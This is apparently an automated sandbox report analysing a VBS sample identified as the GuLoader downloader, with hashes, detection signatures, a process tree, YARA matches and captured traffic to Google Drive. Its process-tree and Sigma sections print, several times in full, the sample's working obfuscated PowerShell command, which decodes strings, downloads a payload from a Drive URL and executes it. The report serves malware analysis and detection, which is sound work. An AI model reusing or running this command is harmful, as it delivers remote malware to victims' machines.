
Windows Analysis Report
2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Overview

General Information

Sample name:2669976595_366408723_KHI_SOF_240702_0957_P.vbs
Analysis ID:1466659
MD5:8a1a3c704c957d6638e61b5d4e4814a2
SHA1:800fcc7219cab666231b2fc8c9fd7463160be8db
SHA256:11a67ec7519d527b1351ba13a36ea0ef91b38a1be0c0d27dafdc9884c57a4894
Tags:vbs

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7596 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. 
CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2300 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3552 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. 
CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4584 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Yara matches in memory dumps and process memory:

Source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_5
Description: Yara detected GuLoader
Author: Joe Security

Source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_5
Description: Yara detected GuLoader
Author: Joe Security

Source: Process Memory Space: powershell.exe PID: 1296
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

Source: Process Memory Space: powershell.exe PID: 1296
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x187f17:$b2: ::FromBase64String(
  • 0x187f4e:$b2: ::FromBase64String(
  • 0x187f86:$b2: ::FromBase64String(
  • 0x187fbf:$b2: ::FromBase64String(
  • 0x187ff9:$b2: ::FromBase64String(
  • 0x188034:$b2: ::FromBase64String(
  • 0x188070:$b2: ::FromBase64String(
  • 0x1880ad:$b2: ::FromBase64String(
  • 0x1880eb:$b2: ::FromBase64String(
  • 0x18812a:$b2: ::FromBase64String(
  • 0x18816a:$b2: ::FromBase64String(
  • 0x1881ab:$b2: ::FromBase64String(
  • 0x1881ed:$b2: ::FromBase64String(
  • 0x188230:$b2: ::FromBase64String(
  • 0x188274:$b2: ::FromBase64String(
  • 0x1882b9:$b2: ::FromBase64String(
  • 0x1882ff:$b2: ::FromBase64String(
  • 0x188346:$b2: ::FromBase64String(
  • 0x18838e:$b2: ::FromBase64String(
  • 0x23bfdf:$b2: ::FromBase64String(
  • 0x50f82:$s1: -join

Source: Process Memory Space: powershell.exe PID: 3552
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security
Yara matches in AMSI script logs:

Source: amsi64_1296.amsi.csv
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

Source: amsi32_3552.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xdb75:$b2: ::FromBase64String(
  • 0xcc10:$s1: -join
  • 0x63bc:$s4: +=
  • 0x647e:$s4: +=
  • 0xa6a5:$s4: +=
  • 0xc7c2:$s4: +=
  • 0xcaac:$s4: +=
  • 0xcbf2:$s4: +=
  • 0x15aa9:$s4: +=
  • 0x15b29:$s4: +=
  • 0x15bef:$s4: +=
  • 0x15c6f:$s4: +=
  • 0x15e45:$s4: +=
  • 0x15ec9:$s4: +=
  • 0xd41c:$e4: Get-WmiObject
  • 0xd60b:$e4: Get-Process
  • 0xd663:$e4: Start-Process
  • 0x1672e:$e4: Get-Process

            System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", ProcessId: 7596, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs", ProcessId: 7596, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn
            No Snort rule has matched


            AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown | HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 0000000D.00000002.2679288955.0000000008C99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdb | source: powershell.exe, 0000000D.00000002.2679288955.0000000008C70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdbk | source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb | source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: powershell.exe, 0000000D.00000002.2673202295.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000D.00000002.2673202295.0000000007C53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftuP
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/Is?
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5y
Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9953
Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabM
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
